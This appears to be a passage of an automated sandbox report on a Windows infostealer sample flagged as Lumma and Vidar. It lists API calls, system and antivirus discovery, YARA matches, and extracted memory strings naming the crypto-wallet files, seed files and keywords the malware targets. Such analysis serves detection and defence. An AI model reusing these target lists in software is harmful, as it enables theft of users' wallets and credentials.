Source: C:\Users\user\Desktop\file.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,	0_2_00661928
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00621A42
Source: C:\Users\user\Desktop\file.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	0_2_00662A18
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00629BC3
Source: C:\Users\user\Desktop\file.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	0_2_00661C46
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00629C0E
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00629CA9
Source: C:\Users\user\Desktop\file.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_00660C9C
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00629D34
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00621EEC
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00629F87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	4_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_0042B0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	4_2_0042B1C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	4_2_00429A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	4_2_0042B268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	4_2_0042B2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	4_2_0042AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	4_2_004253E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	4_2_0042B494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	4_2_0042749C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesA,	4_2_0042B556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	4_2_00429D6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	4_2_0042E56F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	4_2_00427576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	4_2_00428DC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	4_2_0042B5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	4_2_0042B580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	4_2_0042B623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoA,	4_2_0042E6A4
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	13_2_00B0A0B0
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: GetLocaleInfoW,	13_2_00B0A1B6
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	13_2_00B0A285
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	13_2_00B09921
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: EnumSystemLocalesW,	13_2_00B01A42
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: EnumSystemLocalesW,	13_2_00B09BC3
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: EnumSystemLocalesW,	13_2_00B09CA9
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: EnumSystemLocalesW,	13_2_00B09C0E
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	13_2_00B09D34
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: GetLocaleInfoW,	13_2_00B01EEC
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: GetLocaleInfoW,	13_2_00B09F87

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006176BF GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_006176BF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_00410C53 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

4_2_00410C53

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

4_2_00410D2E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0.2.file.exe.638ad8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.638ad8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: MSBuild.exe, 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: .,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|3\|windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|DESKTOP\|%DESKTOP%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|2\|Windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda 